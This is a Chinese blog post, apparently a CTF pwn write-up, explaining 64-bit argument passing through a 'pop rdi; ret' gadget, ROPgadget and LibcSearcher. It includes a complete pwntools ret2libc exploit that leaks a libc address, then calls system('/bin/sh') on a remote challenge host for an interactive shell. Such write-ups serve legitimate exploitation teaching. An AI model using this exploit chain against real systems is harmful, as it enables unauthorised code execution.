64位传参利用方法&LibcSearcher使用入门&ROPgadget利用

最新推荐文章于 2024-04-30 11:11:45 发布
最新推荐文章于 2024-04-30 11:11:45 发布
阅读量1k 收藏 5
点赞数 2
文章标签: python linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Carrot_kexin/article/details/120677210
版权

ROP,需要通过puts函数泄露read函数地址,ROP时用puts函数的地址覆盖返回地址,用read函数的GOT表地址作为puts的参数传入。但是64位程序的函数传参是通过寄存器+堆栈的方式,因此无法直接通过栈溢出写入参数。解决方法是:在程序中寻找一处pop %rdi的指令,将数据写入rdi寄存器。
在程序中寻找pop %rdi需要一个叫ROPgadget的工具。
Linux指令:
ROPgadget --binary pwn | grep "pop rdi"

查到在程序的0x400763地址处存在一个pop rdi ; ret的指令。
可以先将rsp所指的那8个字节pop到rdi寄存器,然后再执行一个ret指令,正合我们的需求。

关于LibcSearcher的用法:
这个库最好在Linux下用,Windows下会出一些问题
用已泄露的函数地址,如read_addr去匹配即可
libc = LibcSearcher("read", read_addr) # 获取libc对象
libc.dump("read")可以获取read在对应libc中的偏移
甚至还能直接获取libc中的\bin\sh:
# 直接获取/bin/sh地址
binsh_addr = libc.dump("str_bin_sh") + libc_base

完整代码:

# -*- coding: utf-8
from pwn import *
from LibcSearcher import *
elf = ELF("pwn")
puts_addr = elf.sym['puts']
read_got = elf.got['read']
poprdi_addr = 0x400763  # 在这个地方有指令:pop rdi; ret
main_addr = 0x4006B8


payload1 = "a" * 0x40  # rubbish
payload1 += p64(0)  # old rbp
payload1 += p64(poprdi_addr)  # 第一次返回到pop rdi的地方
payload1 += p64(read_got)  # 这是puts的参数
payload1 += p64(puts_addr)
payload1 += p64(main_addr) # puts函数的返回地址,重新进入main函数
payload1 += "b" * (200 - len(payload1))

io = remote("111.200.241.244", 55160)
io.send(payload1)
io.recvline()
read_addr = io.recvline().split("\n")[0]
print(len(read_addr))
for i in range(len(read_addr), 8):
    read_addr += '\x00'  # 补足8字节
read_addr = u64(read_addr)
print(hex(read_addr))

# 用LibcSearcher查询函数,只需要传入已经泄露的地址即可自动匹配
libc = LibcSearcher("read", read_addr) # 获取libc对象
libc_base = read_addr - libc.dump("read")
system_addr = libc_base + libc.dump("system")

# 直接获取/bin/sh地址
binsh_addr = libc.dump("str_bin_sh") + libc_base

# 第二次需要调用system(binsh_addr)
payload2 = "a" * 0x40  # rubbish
payload2 += p64(0)  # old rbp
payload2 += p64(poprdi_addr)  # 第一次返回到pop rdi的地方
payload2 += p64(binsh_addr)  # 这是system的参数
payload2 += p64(system_addr)
payload2 += p64(main_addr)  # system函数的返回地址,重新进入main函数
payload2 += "b" * (200 - len(payload2))
io.send(payload2)
io.interactive()
Carrot_kexin
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JoinChar 向地址中加入 ? 或 & 用于实现传参
10-30
JoinChar 向地址中加入 ? 或 & 用于实现传参
传参后参数值改变了
sean199033的专栏
11-26 1221
这是个很有意思的问题,改天写,作为上一篇的z
32位机与64位机数据大小
coderCong的博客
07-29 381
32位编译器:         char :1个字节       char*(即指针变量): 4个字节(32位的寻址空间是2^32, 即32个bit,也就是4个字节。同理64位编译器)       short int : 2个字节       int:  4个字节       unsigned int : 4个字节       float:  4个字节       double:
BugkuCTF-PWN题pwn3-read_note超详细讲解
am_03的博客
08-30 2496
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
64位函数参数传递方式
热门推荐
qq_35467337的博客
03-08 1万+
64位函数传参方式
c++rs法计算hurst指数_计算机组成原理与接口技术
weixin_39564524的博客
11-21 293
计算机组成原理与接口技术——基于MIPS架构@TOC为什么要写这个笔记? 课后整理笔记是一个复习的过程。上学期写了一个数字电路的笔记,感觉这门课一下子得心应手起来。这学期继续这个做法,选几门觉得难的课程整理下笔记写给读者 感谢你阅读本笔记,本文不允许任何形式的转载。有任何问题可以与我联系,我的邮箱是[email protected]第一章 计算机基础1. 计算机结构 计算机系统由软件和硬...
C++中参数传递方式讨论
人生如旅
07-31 808
众所周知,在C++中调用函数时有三种参数传递方式: (1)传值调用; (2)传址调用(传指针); (3)引用传递; 实际上,还有一种参数传递方式,就是全局变量传递方式。这里的“全局”变量并不见得就是真正的全局的,所有代码都可以直接访问的,只要这个变量
小结一下KeilC与IAR对函数参数及返回值的处理
是真学霸自风流,公众号:IC免费课
06-25 2872
转载地址:http://www.dzkfw.com.cn/Article/keilc/566.html 以前从来没关注过这个,汗。 在C51中,KeilC与IAR在函数参数的传递及返回值的处理上,有着较大的不同。本文主要小结不同,并稍稍发表Hanny个人对这些方式的优缺点的看法。 首先,我们对数据类型进行分类。根据数据类型的长度,我们可以将数据简单分为:bit, u8, u16, u3
Windows下x64反汇编参数传递约定,一句话,调用顺序为从左到右, Function( rcx, rdx, r8,r9, [rsp+0x20], [rsp+0x28], [rsp+0x30]..
AppNinja 开发手记
11-09 3560
x64 体系结构是 x86 的向后兼容扩展。 它提供与 x86 相同的旧 32 位模式,以及新的 64 位模式。术语"x64"包括 AMD 64 和 Intel64。 指令集接近相同。x64 将 x86 的 8 个常规用途寄存器扩展为 64 位,并添加了 8 个新的 64 位寄存器。 64 位寄存器的名称以"r"开头,因此例如, eax 的 64 位扩展名为 rax。 新寄存器的名称为 r8 到 r15。每个寄存器的低 32 位、16 位和 8 位可直接在操作数中处理。 这包括寄存器,如 esi,其低 8
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 2824
pwn笔记 - ret2text - 函数传参
rop、64位程序中参数传递及栈溢出利用
RKAnjia的博客
11-24 793
ctf64位程序中参数传递及栈溢出利用rop 64位程序中参数传递及栈溢出利用 32位程序参数传递是直接弹出栈顶元素作为参数,而64位程序通过edi寄存器传参;因此在栈溢出漏洞利用的步骤为: 找到“pop edi\rdi;ret;”语句、system函数和“bin/sh”字符串的地址,输入数据:【填满栈空间的数据+覆盖edb的数据(32位大小为4h,64位大小为8h)+“pop edi\rdi;ret;”语句的地址+“bin/sh”字符串的地址+system函数的地址】。 具体执行过程: 子函数调用结束时,
PHP闭包函数传参使用外部变量的方法
12-19
在Laravel控制器写两个方法,一个是在内部创建一个闭包函数,一个是执行传过来的闭包函数,测试闭包的写法,use使用外部变量,及闭包函数的传参。如下: //测试闭包传参及use使用外部变量 public function ...
使用layui的router来进行传参的实现方法
10-16
今天小编就为大家分享一篇使用layui的router来进行传参的实现方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
vue的传参方式汇总和router使用技巧
08-27
主要介绍了vue的传参方式和router使用技巧,本文给大家列举了好几种传参方式,需要的朋友可以参考下
js匿名函数使用&传参(实例)
10-19
下面小编就为大家带来一篇js匿名函数使用&传参(实例)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Day25-Java基础之常用类1
m0_46053885的博客
04-27 889
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
Lambda表达式特点
weixin_57763462的博客
04-24 811
**API 设计**:Lambda 表达式鼓励使用函数式接口的设计模式,这改变了 Java 库的设计,例如 `java.util.function` 包下的一系列函数式接口。- **函数式编程**:Lambda 表达式引入了函数式编程的理念,使得 Java 更接近于函数式编程语言,如 Scala 和 Clojure。- **并发编程**:Lambda 表达式与 Java 8 新增的 Stream API 结合使用,可以简化并发编程,特别是与集合的操作相关。
selenium 4.x 入门(环境搭建、八大元素定位)
u014694915的博客
04-26 763
Web自动化测现状1.属于E2E测试2.过去通过点点点3.好的测试,还需要记录、调试网页的细节。
AttributeError: module ‘numpy‘ has no attribute ‘float‘.的解决方法
最新发布
chen_znn的博客
04-30 324
本文记录了AttributeError: module 'numpy' has no attribute 'float'.的解决方法
LibcSearcher
07-16
LibcSearcher是一个用于解决CTF比赛中pwn题目中libc库版本不一致带来的问题的工具。它可以通过泄漏的函数地址来确定libc库的版本,并提供与该版本匹配的函数地址和偏移。这样可以帮助我们在利用漏洞时快速定位正确的系统函数,提高攻击的成功率。LibcSearcher可以通过解析libc库文件,查找库中的符号地址和偏移,从而实现这个功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值